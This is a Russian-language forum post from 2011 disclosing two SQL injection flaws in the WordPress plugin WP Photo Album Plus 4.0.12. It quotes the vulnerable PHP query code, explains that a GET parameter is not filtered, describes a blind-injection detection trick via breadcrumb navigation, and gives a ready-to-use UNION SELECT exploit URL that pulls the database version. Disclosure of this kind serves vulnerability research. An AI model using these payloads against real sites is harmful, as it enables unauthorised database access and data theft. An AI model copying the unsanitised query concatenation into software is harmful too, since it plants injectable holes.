15.09.2011, 02:28
|
|
Новичок
Регистрация: 25.08.2011
Сообщений: 7
Провел на форуме:
2607
Репутация:
0
|
|
WP Photo Album Plus 4.0.12
#1 Blind SQLi @ wppa-functions.php:
Код:
function wppa_crumb_page_ancestors($sep, $page = '0') {
global $wpdb;
global $wppa;
$query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
$parent = $wpdb->get_var($query);
if (!is_numeric($parent) || $parent == '0') return;
wppa_crumb_page_ancestors($sep, $parent);
$query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
$title = $wpdb->get_var($query);
if (!$title) {
$title = '****'; // Page exists but is not publish
$wppa['out'] .= wppa_nltab().'';
$wppa['out'] .= wppa_nltab().''.$title.$sep.'';
} else {
$wppa['out'] .= wppa_nltab().''.$title.'';
$wppa['out'] .= wppa_nltab().''.$sep.'';
}
}
переменная $page из _GET не фильтруется.
exploit:
Если уровень вложения страницы галеры > 1, то при кривом запросе родительский элемент пропадает из навигации хлебных крошек.
#2 SQLi @ wppa-functions.php
Код:
$thumbs = $wpdb->get_results('SELECT * FROM '.WPPA_PHOTOS.' WHERE mean_rating > 0 AND album = '.$alb.' ORDER BY mean_rating DESC LIMIT '.$max, 'ARRAY_A');
exploit:
somehomst.com/?page_id=9&topten=1&album=1 UNION ALL SELECT 1,2,3,version(),5,6,7,8,9,10--
|
|
|